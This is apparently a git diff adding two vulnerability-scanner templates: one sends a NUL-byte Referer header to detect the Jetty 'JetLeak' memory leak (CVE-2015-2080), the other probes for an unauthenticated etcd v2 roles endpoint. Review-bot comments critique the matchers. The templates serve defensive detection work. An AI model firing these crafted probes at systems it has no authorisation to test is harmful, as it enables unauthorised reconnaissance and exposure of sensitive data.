Merge branch 'master' into more-templates
commit
c31a2c9f6c
|
@ -38,12 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||
| cves | 231 | vulnerabilities | 105 | exposed-panels | 104 |
|
||||
| exposures | 61 | technologies | 50 | misconfiguration | 53 |
|
||||
| cves | 232 | vulnerabilities | 105 | exposed-panels | 103 |
|
||||
| exposures | 61 | technologies | 50 | misconfiguration | 54 |
|
||||
| workflows | 23 | miscellaneous | 16 | default-logins | 18 |
|
||||
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
||||
| helpers | 2 | takeovers | 1 | - | - |
|
||||
|
||||
**72 directories, 696 files**.
|
||||
**72 directories, 697 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2015-2080
|
||||
|
||||
info:
|
||||
name: Eclipse Jetty Remote Leakage
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-2080
|
||||
description: |
|
||||
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/"
|
||||
headers:
|
||||
Referer: "\x00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 400
|
||||
- type: word
|
||||
words:
|
||||
- "Illegal character 0x0 in state"
|
||||
part: body
|
|
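Review bot: The word matcher at the end of the template is scoped with `part: body`, but as far as I recall Jetty reports this parser error in the status-line reason phrase rather than the response body, so a body-only match may miss affected servers. Consider `part: all` unless a body hit has been confirmed against a known-vulnerable build. Separately, the matched string only shows that the parser rejected the NUL byte, not that buffer contents were echoed back. If fixed Jetty releases keep the same message prefix they would be reported as vulnerable, which is worth verifying before the result is used for triage. The page has lost the YAML indentation, so the nesting of `headers:` and `part:` could not be checked here.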
@ -0,0 +1,29 @@
|
|||
id: http-etcd-unauthenticated-api-data-leak
|
||||
|
||||
info:
|
||||
name: etcd Unauthenticated HTTP API Leak
|
||||
author: dhiyaneshDk
|
||||
severity: high
|
||||
reference: https://hackerone.com/reports/1088429
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/v2/auth/roles"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"roles"'
|
||||
- '"permissions"'
|
||||
- '"role"'
|
||||
- '"kv"'
|
||||
condition: and
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/plain"
|
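Review bot: The final header matcher requires `text/plain`, and with `matchers-condition: and` an instance that serves this endpoint as JSON would never be reported. I believe the etcd v2 API normally answers with `application/json`, so this looks like a source of false negatives. Consider accepting both by adding `- "application/json"` under that matcher's `words:` together with `condition: or`. The `info` block also has no `description`. One line would help whoever triages the finding, stating that the v2 auth API answered without credentials and that the remediation is to enable authentication and restrict network access to the client port.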